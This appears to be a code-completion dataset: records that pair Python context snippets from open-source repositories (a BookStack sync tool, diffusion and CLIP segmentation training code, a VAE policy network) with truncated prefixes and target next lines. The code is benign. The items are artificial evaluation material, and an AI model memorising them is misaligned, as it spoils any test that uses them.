class SpeakerMap:
"""
多语言关系表
"""
def __init__(self) -> None:
log_instance.info("正在加载模型发音人多语言关系表...")
| self.map_data: dict = read_config("speakers_map.json")
| 1 | 2023-12-21 13:50:50+00:00 | 2k |
jaypyles/obsidian-to-bookstack | obsidian_to_bookstack/bookstack/collectors/remote/RemoteBookCollector.py | [
{
"identifier": "Book",
"path": "obsidian_to_bookstack/bookstack/artifacts.py",
"snippet": "class Book:\n def __init__(\n self,\n name: str,\n shelf: Shelf | None = None,\n client: Client | None = None,\n chapters: List = [],\n path: str = \"\",\n details: Dict = {},\n from_client: bool = True,\n ) -> None:\n self.path = path\n self.name = name\n self.client = client\n self.shelf = shelf\n self.chapters = chapters\n self.details = details\n if from_client:\n self.pages = []\n else:\n self._set_pages()\n\n def __str__(self) -> str:\n return self.name\n\n def _set_pages(self):\n pages = []\n chapters = []\n\n for item in os.listdir(self.path):\n item_path = os.path.join(self.path, item)\n if os.path.isdir(item_path):\n chapters.append(\n Chapter(\n path=os.path.join(self.path, item),\n name=item,\n client=self.client,\n shelf=self.shelf,\n book=self,\n from_client=False,\n )\n )\n else:\n if os.path.splitext(item)[1] == \".md\":\n pages.append(\n Page(\n path=os.path.join(self.path, item),\n name=item,\n client=self.client,\n shelf=self.shelf,\n book=self,\n )\n )\n\n self.pages = pages\n self.chapters = chapters"
},
{
"identifier": "Shelf",
"path": "obsidian_to_bookstack/bookstack/artifacts.py",
"snippet": "class Shelf:\n def __init__(\n self,\n name: str,\n client: Client | None = None,\n from_client: bool = True,\n path: str = \"\",\n details: Dict = {},\n ) -> None:\n self.path = path\n self.name = name\n self.client = client\n if from_client:\n self.books = []\n else:\n self.books = self._set_books()\n self.client_books: list[dict] = []\n self.details = details\n\n def __str__(self) -> str:\n return self.name\n\n def _set_books(self):\n books = []\n for book in os.listdir(self.path):\n if os.path.isdir(os.path.join(self.path, book)) and not book.startswith(\n \".\"\n ):\n b = Book(\n path=os.path.join(self.path, book),\n name=book,\n client=self.client,\n shelf=self,\n from_client=False,\n )\n books.append(b)\n\n return books"
},
{
"identifier": "RemoteClient",
"path": "obsidian_to_bookstack/bookstack/client.py",
"snippet": "class RemoteClient(Client):\n @abstractmethod\n def __init__(self) -> None:\n super().__init__()\n self.id = os.getenv(\"BOOKSTACK_TOKEN_ID\")\n self.secret = os.getenv(\"BOOKSTACK_TOKEN_SECRET\")\n self.base_url = os.getenv(\"BOOKSTACK_BASE_URL\")\n self.headers = {\"Authorization\": f\"Token {self.id}:{self.secret}\"}\n self.http = urllib3.PoolManager()\n\n def _make_request(\n self,\n request_type: RequestType,\n endpoint: BookstackAPIEndpoints | DetailedBookstackLink,\n body=None,\n json=None,\n ) -> urllib3.BaseHTTPResponse:\n \"\"\"Make a HTTP request to a Bookstack API Endpoint\"\"\"\n\n assert self.base_url\n\n request_url = self.base_url + endpoint.value\n resp = self.http.request(\n request_type.value, request_url, headers=self.headers, body=body, json=json\n )\n return resp\n\n def _get_from_client(self, endpoint: BookstackAPIEndpoints):\n \"\"\"Make a GET request to a Bookstack API Endpoint\"\"\"\n resp = self._make_request(RequestType.GET, endpoint)\n assert resp\n\n data = json.loads(resp.data.decode())\n return data[\"data\"]"
},
{
"identifier": "RemoteCollector",
"path": "obsidian_to_bookstack/bookstack/collectors/collector.py",
"snippet": "class RemoteCollector(BaseCollector):\n def __init__(self, verbose: bool, client: RemoteClient) -> None:\n super().__init__(verbose)\n self.client = client"
},
{
"identifier": "console",
"path": "obsidian_to_bookstack/console.py",
"snippet": ""
},
{
"identifier": "con_hash",
"path": "obsidian_to_bookstack/utils.py",
"snippet": "def con_hash(key: str) -> int:\n \"\"\"Get a consistent hash of a key\"\"\"\n hash_obj = hashlib.md5(key.encode())\n hex_digest = hash_obj.hexdigest()\n return int(hex_digest, 16)"
}
] | import json
from typing import List
from obsidian_to_bookstack.bookstack.artifacts import Book, Shelf
from obsidian_to_bookstack.bookstack.client import RemoteClient
from obsidian_to_bookstack.bookstack.collectors.collector import \
RemoteCollector
from obsidian_to_bookstack.bookstack.constants import *
from obsidian_to_bookstack.console import console
from obsidian_to_bookstack.utils import con_hash | 1,432 |
class RemoteBookCollector(RemoteCollector):
def __init__(self, verbose: bool, client: RemoteClient) -> None:
super().__init__(verbose, client)
def get_books(self, shelves: List[Shelf]):
"""Get remote books from shelves"""
client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS)
for book in client_books:
class DetailedBook(DetailedBookstackLink):
LINK = f"/api/books/{book['id']}"
details = json.loads(
self.client._make_request(
RequestType.GET,
DetailedBook.LINK,
).data.decode()
)
book["details"] = details
books = [Book(book["name"], details=book["details"]) for book in client_books]
BOOK_MAP = {
con_hash(book.name + str(book.details["id"])): book for book in books
}
for shelf in shelves:
for book in shelf.client_books:
b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"])))
if b:
b.shelf = shelf
shelf.books.append(b)
if self.verbose:
|
class RemoteBookCollector(RemoteCollector):
def __init__(self, verbose: bool, client: RemoteClient) -> None:
super().__init__(verbose, client)
def get_books(self, shelves: List[Shelf]):
"""Get remote books from shelves"""
client_books = self.client._get_from_client(BookstackAPIEndpoints.BOOKS)
for book in client_books:
class DetailedBook(DetailedBookstackLink):
LINK = f"/api/books/{book['id']}"
details = json.loads(
self.client._make_request(
RequestType.GET,
DetailedBook.LINK,
).data.decode()
)
book["details"] = details
books = [Book(book["name"], details=book["details"]) for book in client_books]
BOOK_MAP = {
con_hash(book.name + str(book.details["id"])): book for book in books
}
for shelf in shelves:
for book in shelf.client_books:
b = BOOK_MAP.get(con_hash(book["name"] + str(book["id"])))
if b:
b.shelf = shelf
shelf.books.append(b)
if self.verbose: | console.log(f"Found remote book: {b}") | 4 | 2023-12-20 02:22:33+00:00 | 2k |
MingtaoGuo/AnimateAnyone_unofficial | tutorial_train_animate.py | [
{
"identifier": "MyDataset",
"path": "tutorial_dataset.py",
"snippet": "class MyDataset(Dataset):\n def __init__(self, path=\"/mnt/gmt/Dataset/\"):\n self.path = path\n self.videos = os.listdir(path + \"fashion_png\")\n\n def __len__(self):\n return len(self.videos) * 10\n\n def __getitem__(self, idx):\n video_name = np.random.choice(self.videos)\n frames = np.random.choice(os.listdir(self.path + \"/fashion_png/\" + video_name), [2])\n ref_frame, tgt_frame = frames[0], frames[1]\n ref_bgr = cv2.imread(self.path + \"/fashion_png/\" + video_name + \"/\" + ref_frame)\n # ref_bgr = cv2.resize(ref_bgr, (256, 256))\n ref_rgb = cv2.cvtColor(ref_bgr, cv2.COLOR_BGR2RGB)\n ref_rgb = (ref_rgb.astype(np.float32) / 127.5) - 1.0\n\n tgt_bgr = cv2.imread(self.path + \"/fashion_png/\" + video_name + \"/\" + tgt_frame)\n # tgt_bgr = cv2.resize(tgt_bgr, (256, 256))\n tgt_rgb = cv2.cvtColor(tgt_bgr, cv2.COLOR_BGR2RGB)\n tgt_rgb = (tgt_rgb.astype(np.float32) / 127.5) - 1.0\n\n skt_bgr = cv2.imread(self.path + \"/fashion_pose/\" + video_name + \"/\" + tgt_frame)\n # skt_bgr = cv2.resize(skt_bgr, (256, 256))\n skt_rgb = cv2.cvtColor(skt_bgr, cv2.COLOR_BGR2RGB)\n skt_rgb = skt_rgb.astype(np.float32) / 255.0\n\n return dict(target=tgt_rgb, vision=ref_rgb, reference=ref_rgb, skeleton=skt_rgb)"
},
{
"identifier": "ImageLogger",
"path": "aldm/logger.py",
"snippet": "class ImageLogger(Callback):\n def __init__(self, batch_frequency=2000, max_images=4, clamp=True, increase_log_steps=True,\n rescale=True, disabled=False, log_on_batch_idx=False, log_first_step=False,\n log_images_kwargs=None):\n super().__init__()\n self.rescale = rescale\n self.batch_freq = batch_frequency\n self.max_images = max_images\n if not increase_log_steps:\n self.log_steps = [self.batch_freq]\n self.clamp = clamp\n self.disabled = disabled\n self.log_on_batch_idx = log_on_batch_idx\n self.log_images_kwargs = log_images_kwargs if log_images_kwargs else {}\n self.log_first_step = log_first_step\n\n @rank_zero_only\n def log_local(self, save_dir, split, images, global_step, current_epoch, batch_idx):\n root = os.path.join(save_dir, \"image_log\", split)\n for k in images:\n grid = torchvision.utils.make_grid(images[k], nrow=4)\n if self.rescale:\n grid = (grid + 1.0) / 2.0 # -1,1 -> 0,1; c,h,w\n grid = grid.transpose(0, 1).transpose(1, 2).squeeze(-1)\n grid = grid.numpy()\n grid = (grid * 255).astype(np.uint8)\n filename = \"{}_gs-{:06}_e-{:06}_b-{:06}.png\".format(k, global_step, current_epoch, batch_idx)\n path = os.path.join(root, filename)\n os.makedirs(os.path.split(path)[0], exist_ok=True)\n Image.fromarray(grid).save(path)\n\n def log_img(self, pl_module, batch, batch_idx, split=\"train\"):\n check_idx = batch_idx # if self.log_on_batch_idx else pl_module.global_step\n if (self.check_frequency(check_idx) and # batch_idx % self.batch_freq == 0\n hasattr(pl_module, \"log_images\") and\n callable(pl_module.log_images) and\n self.max_images > 0):\n logger = type(pl_module.logger)\n\n is_train = pl_module.training\n if is_train:\n pl_module.eval()\n\n with torch.no_grad():\n images = pl_module.log_images(batch, split=split, **self.log_images_kwargs)\n\n for k in images:\n N = min(images[k].shape[0], self.max_images)\n images[k] = images[k][:N]\n if isinstance(images[k], torch.Tensor):\n images[k] = images[k].detach().cpu()\n if self.clamp:\n images[k] = torch.clamp(images[k], -1., 1.)\n\n self.log_local(pl_module.logger.save_dir, split, images,\n pl_module.global_step, pl_module.current_epoch, batch_idx)\n\n if is_train:\n pl_module.train()\n\n def check_frequency(self, check_idx):\n return check_idx % self.batch_freq == 0\n\n def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n if not self.disabled:\n self.log_img(pl_module, batch, batch_idx, split=\"train\")"
},
{
"identifier": "create_model",
"path": "aldm/model.py",
"snippet": "def create_model(config_path):\n config = OmegaConf.load(config_path)\n model = instantiate_from_config(config.model).cpu()\n print(f'Loaded model config from [{config_path}]')\n return model"
},
{
"identifier": "load_state_dict",
"path": "aldm/model.py",
"snippet": "def load_state_dict(ckpt_path, location='cpu'):\n _, extension = os.path.splitext(ckpt_path)\n if extension.lower() == \".safetensors\":\n import safetensors.torch\n state_dict = safetensors.torch.load_file(ckpt_path, device=location)\n else:\n state_dict = get_state_dict(torch.load(ckpt_path, map_location=torch.device(location)))\n state_dict = get_state_dict(state_dict)\n print(f'Loaded state_dict from [{ckpt_path}]')\n return state_dict"
}
] | from share import *
from torch.utils.data import DataLoader
from tutorial_dataset import MyDataset
from aldm.logger import ImageLogger
from aldm.model import create_model, load_state_dict
import pytorch_lightning as pl | 1,547 |
# Configs
resume_path = './models/reference_sd15_ini.ckpt'
batch_size = 2
logger_freq = 300
learning_rate = 1e-5
# First use cpu to load models. Pytorch Lightning will automatically move it to GPUs.
model = create_model('./models/aldm_v15.yaml').cpu()
model.load_state_dict(load_state_dict(resume_path, location='cpu'))
model.learning_rate = learning_rate
# Misc
|
# Configs
resume_path = './models/reference_sd15_ini.ckpt'
batch_size = 2
logger_freq = 300
learning_rate = 1e-5
# First use cpu to load models. Pytorch Lightning will automatically move it to GPUs.
model = create_model('./models/aldm_v15.yaml').cpu()
model.load_state_dict(load_state_dict(resume_path, location='cpu'))
model.learning_rate = learning_rate
# Misc | dataset = MyDataset() | 0 | 2023-12-16 03:31:33+00:00 | 2k |
yasserben/CLOUDS | clouds/modeling/meta_arch/clouds_head.py | [
{
"identifier": "build_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/clouds_transformer_decoder.py",
"snippet": "def build_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_original_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/mask2former_transformer_decoder.py",
"snippet": "def build_original_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_bis_transformer_decoder",
"path": "clouds/modeling/transformer_decoder/clouds_bis_transformer_decoder.py",
"snippet": "def build_bis_transformer_decoder(cfg, in_channels, mask_classification=True):\n \"\"\"\n Build a instance embedding branch from `cfg.MODEL.INS_EMBED_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME\n return TRANSFORMER_DECODER_REGISTRY.get(name)(cfg, in_channels, mask_classification)"
},
{
"identifier": "build_pixel_decoder",
"path": "clouds/modeling/pixel_decoder/msdeformattn.py",
"snippet": "def build_pixel_decoder(cfg, input_shape):\n \"\"\"\n Build a pixel decoder from `cfg.MODEL.ONE_FORMER.PIXEL_DECODER_NAME`.\n \"\"\"\n name = cfg.MODEL.SEM_SEG_HEAD.PIXEL_DECODER_NAME\n model = SEM_SEG_HEADS_REGISTRY.get(name)(cfg, input_shape)\n forward_features = getattr(model, \"forward_features\", None)\n if not callable(forward_features):\n raise ValueError(\n \"Only SEM_SEG_HEADS with forward_features method can be used as pixel decoder. \"\n f\"Please implement forward_features for {name} to only return mask features.\"\n )\n return model"
}
] | import logging
import fvcore.nn.weight_init as weight_init
from copy import deepcopy
from typing import Callable, Dict, List, Optional, Tuple, Union
from torch import nn
from torch.nn import functional as F
from detectron2.config import configurable
from detectron2.layers import Conv2d, ShapeSpec, get_norm
from detectron2.modeling import SEM_SEG_HEADS_REGISTRY
from ..transformer_decoder.clouds_transformer_decoder import build_transformer_decoder
from ..transformer_decoder.mask2former_transformer_decoder import (
build_original_transformer_decoder,
)
from ..transformer_decoder.clouds_bis_transformer_decoder import (
build_bis_transformer_decoder,
)
from ..pixel_decoder.msdeformattn import build_pixel_decoder | 1,202 | """
Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved.
Licensed under the Apache License, Version 2.0
Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py
"""
@SEM_SEG_HEADS_REGISTRY.register()
class CLOUDSHead(nn.Module):
@configurable
def __init__(
self,
input_shape: Dict[str, ShapeSpec],
*,
num_classes: int,
pixel_decoder: nn.Module,
loss_weight: float = 1.0,
ignore_value: int = -1,
# extra parameters
transformer_predictor: nn.Module,
transformer_in_feature: str,
name_transformer_predictor: str,
):
"""
NOTE: this interface is experimental.
Args:
input_shape: shapes (channels and stride) of the input features
num_classes: number of classes to predict
pixel_decoder: the pixel decoder module
loss_weight: loss weight
ignore_value: category id to be ignored during training.
transformer_predictor: the transformer decoder that makes prediction
transformer_in_feature: input feature name to the transformer_predictor
"""
super().__init__()
input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride)
self.in_features = [k for k, v in input_shape]
feature_strides = [v.stride for k, v in input_shape]
feature_channels = [v.channels for k, v in input_shape]
self.ignore_value = ignore_value
self.common_stride = 4
self.loss_weight = loss_weight
self.pixel_decoder = pixel_decoder
self.predictor = transformer_predictor
self.transformer_in_feature = transformer_in_feature
self.num_classes = num_classes
self.name_transformer_predictor = name_transformer_predictor
@classmethod
def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):
# figure out in_channels to transformer predictor
if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder":
transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM
else:
raise NotImplementedError
if (
cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME
== "MultiScaleMaskedTransformerDecoder"
):
return {
"input_shape": {
k: v
for k, v in input_shape.items()
if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES
},
"ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
"num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
| """
Copyright 2023 Telecom Paris, Yasser BENIGMIM. All rights reserved.
Licensed under the Apache License, Version 2.0
Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/modeling/meta_arch/mask_former_head.py
"""
@SEM_SEG_HEADS_REGISTRY.register()
class CLOUDSHead(nn.Module):
@configurable
def __init__(
self,
input_shape: Dict[str, ShapeSpec],
*,
num_classes: int,
pixel_decoder: nn.Module,
loss_weight: float = 1.0,
ignore_value: int = -1,
# extra parameters
transformer_predictor: nn.Module,
transformer_in_feature: str,
name_transformer_predictor: str,
):
"""
NOTE: this interface is experimental.
Args:
input_shape: shapes (channels and stride) of the input features
num_classes: number of classes to predict
pixel_decoder: the pixel decoder module
loss_weight: loss weight
ignore_value: category id to be ignored during training.
transformer_predictor: the transformer decoder that makes prediction
transformer_in_feature: input feature name to the transformer_predictor
"""
super().__init__()
input_shape = sorted(input_shape.items(), key=lambda x: x[1].stride)
self.in_features = [k for k, v in input_shape]
feature_strides = [v.stride for k, v in input_shape]
feature_channels = [v.channels for k, v in input_shape]
self.ignore_value = ignore_value
self.common_stride = 4
self.loss_weight = loss_weight
self.pixel_decoder = pixel_decoder
self.predictor = transformer_predictor
self.transformer_in_feature = transformer_in_feature
self.num_classes = num_classes
self.name_transformer_predictor = name_transformer_predictor
@classmethod
def from_config(cls, cfg, input_shape: Dict[str, ShapeSpec]):
# figure out in_channels to transformer predictor
if cfg.MODEL.MASK_FORMER.TRANSFORMER_IN_FEATURE == "multi_scale_pixel_decoder":
transformer_predictor_in_channels = cfg.MODEL.SEM_SEG_HEAD.CONVS_DIM
else:
raise NotImplementedError
if (
cfg.MODEL.MASK_FORMER.TRANSFORMER_DECODER_NAME
== "MultiScaleMaskedTransformerDecoder"
):
return {
"input_shape": {
k: v
for k, v in input_shape.items()
if k in cfg.MODEL.SEM_SEG_HEAD.IN_FEATURES
},
"ignore_value": cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
"num_classes": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES, | "pixel_decoder": build_pixel_decoder(cfg, input_shape), | 3 | 2023-12-15 15:40:58+00:00 | 2k |
linyq2117/TagCLIP | CLIP-ES/generate_cams_coco.py | [
{
"identifier": "scoremap2bbox",
"path": "utils.py",
"snippet": "def scoremap2bbox(scoremap, threshold, multi_contour_eval=False):\n height, width = scoremap.shape\n scoremap_image = np.expand_dims((scoremap * 255).astype(np.uint8), 2)\n _, thr_gray_heatmap = cv2.threshold(\n src=scoremap_image,\n thresh=int(threshold * np.max(scoremap_image)),\n maxval=255,\n type=cv2.THRESH_BINARY)\n contours = cv2.findContours(\n image=thr_gray_heatmap,\n mode=cv2.RETR_EXTERNAL,\n method=cv2.CHAIN_APPROX_SIMPLE)[_CONTOUR_INDEX]\n\n if len(contours) == 0:\n return np.asarray([[0, 0, 0, 0]]), 1\n\n if not multi_contour_eval:\n contours = [max(contours, key=cv2.contourArea)]\n\n estimated_boxes = []\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n x0, y0, x1, y1 = x, y, x + w, y + h\n x1 = min(x1, width - 1)\n y1 = min(y1, height - 1)\n estimated_boxes.append([x0, y0, x1, y1])\n\n return np.asarray(estimated_boxes), len(contours)"
},
{
"identifier": "class_names",
"path": "clip_text.py",
"snippet": "BACKGROUND_CATEGORY_VOC = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','keyboard','helmet',\n 'cloud','house','mountain','ocean','road','rock','street','valley','bridge','sign',\n ]\nBACKGROUND_CATEGORY_COCO = ['ground','land','grass','tree','building','wall','sky','lake','water','river','sea','railway','railroad','helmet',\n 'cloud','house','mountain','ocean','road','rock','street','valley','bridge',\n ]"
}
] | from pytorch_grad_cam import GradCAM
from PIL import Image
from tqdm import tqdm
from pytorch_grad_cam.utils.image import scale_cam_image
from utils import scoremap2bbox
from clip_text import class_names, new_class_names_coco, BACKGROUND_CATEGORY_COCO
from torch import multiprocessing
from torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize, RandomHorizontalFlip
from torchvision.transforms import InterpolationMode
import torch
import clip
import numpy as np
import cv2
import os
import argparse
import warnings | 1,508 | # -*- coding:UTF-8 -*-
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
warnings.filterwarnings("ignore")
_CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0
def reshape_transform(tensor, height=28, width=28):
tensor = tensor.permute(1, 0, 2)
result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2))
# Bring the channels to the first dimension,
# like in CNNs.
result = result.transpose(2, 3).transpose(1, 2)
return result
def split_dataset(dataset, all_label_list, n_splits):
if n_splits == 1:
return [dataset], [all_label_list]
part = len(dataset) // n_splits
dataset_list = []
split_label_list = []
for i in range(n_splits - 1):
dataset_list.append(dataset[i*part:(i+1)*part])
split_label_list.append(all_label_list[i*part:(i+1)*part])
dataset_list.append(dataset[(i+1)*part:])
split_label_list.append(all_label_list[(i+1)*part:])
return dataset_list, split_label_list
def zeroshot_classifier(classnames, templates, model):
with torch.no_grad():
zeroshot_weights = []
for classname in classnames:
texts = [template.format(classname) for template in templates] #format with class
texts = clip.tokenize(texts).to(device) #tokenize
class_embeddings = model.encode_text(texts) #embed with text encoder
class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True)
class_embedding = class_embeddings.mean(dim=0)
class_embedding /= class_embedding.norm()
zeroshot_weights.append(class_embedding)
zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device)
return zeroshot_weights.t()
class ClipOutputTarget:
def __init__(self, category):
self.category = category
def __call__(self, model_output):
if len(model_output.shape) == 1:
return model_output[self.category]
return model_output[:, self.category]
def _convert_image_to_rgb(image):
return image.convert("RGB")
def _transform_resize(h, w):
return Compose([
Resize((h,w), interpolation=BICUBIC),
_convert_image_to_rgb,
ToTensor(),
Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)),
])
def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16):
all_imgs = []
for scale in scales:
preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size))
image = preprocess(Image.open(img_path))
image_ori = image
image_flip = torch.flip(image, [-1])
all_imgs.append(image_ori)
all_imgs.append(image_flip)
return all_imgs
def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list):
n_gpus = torch.cuda.device_count()
device_id = "cuda:{}".format(process_id % n_gpus)
databin = dataset_list[process_id]
all_label_list = split_label_list[process_id]
model = model.to(device_id)
bg_text_features = bg_text_features.to(device_id)
fg_text_features = fg_text_features.to(device_id)
for im_idx, im in enumerate(tqdm(databin)):
img_path = os.path.join(args.img_root, im)
ori_image = Image.open(img_path)
ori_height, ori_width = np.asarray(ori_image).shape[:2]
label_id_list = all_label_list[im_idx]
label_list = []
for lid in label_id_list:
| # -*- coding:UTF-8 -*-
try:
BICUBIC = InterpolationMode.BICUBIC
except ImportError:
BICUBIC = Image.BICUBIC
warnings.filterwarnings("ignore")
_CONTOUR_INDEX = 1 if cv2.__version__.split('.')[0] == '3' else 0
def reshape_transform(tensor, height=28, width=28):
tensor = tensor.permute(1, 0, 2)
result = tensor[:, 1:, :].reshape(tensor.size(0), height, width, tensor.size(2))
# Bring the channels to the first dimension,
# like in CNNs.
result = result.transpose(2, 3).transpose(1, 2)
return result
def split_dataset(dataset, all_label_list, n_splits):
if n_splits == 1:
return [dataset], [all_label_list]
part = len(dataset) // n_splits
dataset_list = []
split_label_list = []
for i in range(n_splits - 1):
dataset_list.append(dataset[i*part:(i+1)*part])
split_label_list.append(all_label_list[i*part:(i+1)*part])
dataset_list.append(dataset[(i+1)*part:])
split_label_list.append(all_label_list[(i+1)*part:])
return dataset_list, split_label_list
def zeroshot_classifier(classnames, templates, model):
with torch.no_grad():
zeroshot_weights = []
for classname in classnames:
texts = [template.format(classname) for template in templates] #format with class
texts = clip.tokenize(texts).to(device) #tokenize
class_embeddings = model.encode_text(texts) #embed with text encoder
class_embeddings /= class_embeddings.norm(dim=-1, keepdim=True)
class_embedding = class_embeddings.mean(dim=0)
class_embedding /= class_embedding.norm()
zeroshot_weights.append(class_embedding)
zeroshot_weights = torch.stack(zeroshot_weights, dim=1).to(device)
return zeroshot_weights.t()
class ClipOutputTarget:
def __init__(self, category):
self.category = category
def __call__(self, model_output):
if len(model_output.shape) == 1:
return model_output[self.category]
return model_output[:, self.category]
def _convert_image_to_rgb(image):
return image.convert("RGB")
def _transform_resize(h, w):
return Compose([
Resize((h,w), interpolation=BICUBIC),
_convert_image_to_rgb,
ToTensor(),
Normalize((0.48145466, 0.4578275, 0.40821073), (0.26862954, 0.26130258, 0.27577711)),
])
def img_ms_and_flip(img_path, ori_height, ori_width, scales=[1.0], patch_size=16):
all_imgs = []
for scale in scales:
preprocess = _transform_resize(int(np.ceil(scale * int(ori_height) / patch_size) * patch_size), int(np.ceil(scale * int(ori_width) / patch_size) * patch_size))
image = preprocess(Image.open(img_path))
image_ori = image
image_flip = torch.flip(image, [-1])
all_imgs.append(image_ori)
all_imgs.append(image_flip)
return all_imgs
def perform(process_id, dataset_list, args, model, bg_text_features, fg_text_features, cam, split_label_list):
n_gpus = torch.cuda.device_count()
device_id = "cuda:{}".format(process_id % n_gpus)
databin = dataset_list[process_id]
all_label_list = split_label_list[process_id]
model = model.to(device_id)
bg_text_features = bg_text_features.to(device_id)
fg_text_features = fg_text_features.to(device_id)
for im_idx, im in enumerate(tqdm(databin)):
img_path = os.path.join(args.img_root, im)
ori_image = Image.open(img_path)
ori_height, ori_width = np.asarray(ori_image).shape[:2]
label_id_list = all_label_list[im_idx]
label_list = []
for lid in label_id_list: | label_list.append(new_class_names_coco[int(lid)]) | 0 | 2023-12-21 03:20:47+00:00 | 2k |
cypypccpy/dynamic_handover | dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/policy_network/vae_policy.py | [
{
"identifier": "POLICYNETWORKS",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "POLICYNETWORKS = Registry('policy_network')"
},
{
"identifier": "build_backbone",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "def build_backbone(cfg):\n return build(cfg, BACKBONES)"
},
{
"identifier": "build_dense_head",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/builder.py",
"snippet": "def build_dense_head(cfg):\n return build(cfg, DENSEHEADS)"
},
{
"identifier": "replace_placeholder_with_args",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py",
"snippet": "def replace_placeholder_with_args(parameters, **kwargs):\n if isinstance(parameters, ConfigDict):\n for key, v in parameters.items():\n parameters[key] = replace_placeholder_with_args(v, **kwargs)\n return parameters\n elif isinstance(parameters, (tuple, list)):\n type_of_parameters = type(parameters)\n parameters = list(parameters)\n for i, parameter in enumerate(parameters):\n parameters[i] = replace_placeholder_with_args(parameter, **kwargs)\n return type_of_parameters(parameters)\n elif isinstance(parameters, Number):\n return parameters\n elif isinstance(parameters, str):\n for key in kwargs:\n if key in parameters:\n parameters = parameters.replace(key, str(kwargs[key]))\n try:\n return eval(parameters)\n except:\n return parameters\n elif parameters is None:\n return None\n else:\n print(f'Strange type!! {parameters}, type of parameters {type(parameters)}')"
},
{
"identifier": "get_kwargs_from_shape",
"path": "dexteroushandenvs/algorithms/utils/mani_skill_learn/networks/utils.py",
"snippet": "def get_kwargs_from_shape(obs_shape, action_shape):\n replaceable_kwargs = {}\n if action_shape is not None:\n replaceable_kwargs['action_shape'] = action_shape\n if isinstance(obs_shape, dict):\n if 'pointcloud' in obs_shape.keys():\n # For mani_skill point cloud input\n replaceable_kwargs['pcd_all_channel'] = (\n obs_shape['pointcloud']['xyz'][-1] +\n obs_shape['pointcloud']['rgb'][-1] +\n obs_shape['pointcloud']['seg'][-1]\n )\n replaceable_kwargs['num_objs'] = obs_shape['pointcloud']['seg'][-1]\n replaceable_kwargs['pcd_xyz_rgb_channel'] = (\n obs_shape['pointcloud']['xyz'][-1] +\n obs_shape['pointcloud']['rgb'][-1]\n )\n if 'rgbd' in obs_shape.keys():\n # For mani_skill point rgbd input\n mode = list(obs_shape['rgbd'].keys())[0]\n # image format is H, W, C\n replaceable_kwargs['rgbd_channel'] = (\n obs_shape['rgbd'][mode]['rgb'][-1] +\n obs_shape['rgbd'][mode]['depth'][-1] +\n obs_shape['rgbd'][mode]['seg'][-1]\n )\n replaceable_kwargs['agent_shape'] = obs_shape['state']\n else:\n replaceable_kwargs['obs_shape'] = obs_shape\n return replaceable_kwargs"
}
] | from algorithms.utils.mani_skill_learn.utils.data import to_torch
from algorithms.utils.mani_skill_learn.utils.torch import ExtendedModule
from ..builder import POLICYNETWORKS, build_backbone, build_dense_head
from ..utils import replace_placeholder_with_args, get_kwargs_from_shape | 865 |
@POLICYNETWORKS.register_module()
class VAEPolicy(ExtendedModule):
def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None):
super(VAEPolicy, self).__init__()
replaceable_kwargs = get_kwargs_from_shape(obs_shape, action_shape)
|
@POLICYNETWORKS.register_module()
class VAEPolicy(ExtendedModule):
def __init__(self, nn_cfg, policy_head_cfg, action_space, obs_shape=None, action_shape=None):
super(VAEPolicy, self).__init__()
